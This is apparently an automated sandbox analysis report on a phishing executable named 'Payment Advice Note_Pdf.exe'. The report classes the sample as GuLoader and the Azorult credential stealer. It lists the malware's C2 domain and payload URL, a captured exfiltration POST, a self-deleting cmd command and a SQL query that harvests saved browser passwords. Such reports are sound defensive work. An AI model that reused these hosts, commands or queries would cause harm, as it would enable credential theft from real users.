Edit tour

Windows Analysis Report
Payment Advice Note_Pdf.exe

Overview

General Information

Sample name:	Payment Advice Note_Pdf.exe
Analysis ID:	1522667
MD5:	6252d288d82fa00e65d3ba32bdc53411
SHA1:	c9c0c3e7d495ad742c76260964810ed5f0b82cd1
SHA256:	9f2aca94590b9f367108ce3db9f0c67d35e884f1f254fb7f761e00f2c905bdcf
Infos:

Detection

Azorult, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Azorult

Yara detected GuLoader

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Sample is not signed and drops a device driver

Self deletion via cmd or bat file

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64native

Payment Advice Note_Pdf.exe (PID: 9048 cmdline: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe" MD5: 6252D288D82FA00E65D3BA32BDC53411)

Payment Advice Note_Pdf.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe" MD5: 6252D288D82FA00E65D3BA32BDC53411)

cmd.exe (PID: 7248 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

timeout.exe (PID: 3480 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1353774402.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1404635132.0000000000060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000002.00000002.1428296777.0000000036140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1305639727.00000000077F5000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x41dd81:$string1: SELECT origin_url, username_value, password_value FROM logins 0x421e68:$string1: SELECT origin_url, username_value, password_value FROM logins 0x29261f:$string2: API call with %s database connection pointer 0x293253:$string3: os_win.c:%d: (%lu) %s(%s) - %s
2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x426c53:$string1: SELECT origin_url, username_value, password_value FROM logins 0x42ad3a:$string1: SELECT origin_url, username_value, password_value FROM logins 0x29b4f1:$string2: API call with %s database connection pointer 0x29c125:$string3: os_win.c:%d: (%lu) %s(%s) - %s
2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x4224e9:$string1: SELECT origin_url, username_value, password_value FROM logins 0x4265d0:$string1: SELECT origin_url, username_value, password_value FROM logins 0x296d87:$string2: API call with %s database connection pointer 0x2979bb:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Click to see the 1 entries

Suricata Signatures

ET MALWARE AZORult v3.3 Server Response M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:10:13.347682+0200	2029138	1	Malware Command and Control Activity Detected	172.67.215.93	80	192.168.11.20	49754	TCP

ET MALWARE Win32/AZORult V3.3 Client Checkin M15

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:10:13.091884+0200	2029468	1	Malware Command and Control Activity Detected	192.168.11.20	49754	172.67.215.93	80	TCP
2024-09-30T15:10:20.388178+0200	2029468	1	Malware Command and Control Activity Detected	192.168.11.20	49755	172.67.215.93	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:10:13.091884+0200	2810276	1	Malware Command and Control Activity Detected	192.168.11.20	49754	172.67.215.93	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:10:10.639148+0200	2803270	2	Potentially Bad Traffic	192.168.11.20	49753	172.93.121.126	443	TCP

HTTP traffic detected: POST /MI341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: d4hk.shopContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5

Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://d4hk.shop/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://d4hk.shop/MI341/index.php
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://d4hk.shop/MI341/index.phpA
Source: Payment Advice Note_Pdf.exe, 00000000.00000000.884748585.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005429000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354338715.0000000000068000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354292731.0000000000064000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.0000000005426000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.0000000005426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.000000000541B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.000000000541B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.0000000005426000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uktnl.vantechdns.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1417784434.0000000007030000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://uktnl.vantechdns.com/Hpgcc91.bin
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uktnl.vantechdns.com/d4

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: unknown

HTTPS traffic detected: 172.93.121.126:443 -> 192.168.11.20:49753 version: TLS 1.2

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052BD

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Payment Advice Note_Pdf.exe
Source: initial sample	Static PE information: Filename: Payment Advice Note_Pdf.exe

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_0040326A

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File created: C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_004066E3	0_2_004066E3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_00404AFA	0_2_00404AFA
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_004066E3	2_2_004066E3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_00404AFA	2_2_00404AFA

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: String function: 00402BBF appears 51 times

Source: Payment Advice Note_Pdf.exe

Static PE information: invalid certificate

Source: api-ms-win-crt-multibyte-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.2.dr	Static PE information: No import functions for PE file found

Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Payment Advice Note_Pdf.exe
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Payment Advice Note_Pdf.exe

Source: Payment Advice Note_Pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@8/56@3/2

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_0040326A

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040457E

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File created: C:\Users\user\toenailed

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-884F1CAE-06B5F66D
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsvE6B1.tmp

Jump to behavior

Source: Payment Advice Note_Pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.000000000542E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment Advice Note_Pdf.exe

Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File read: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
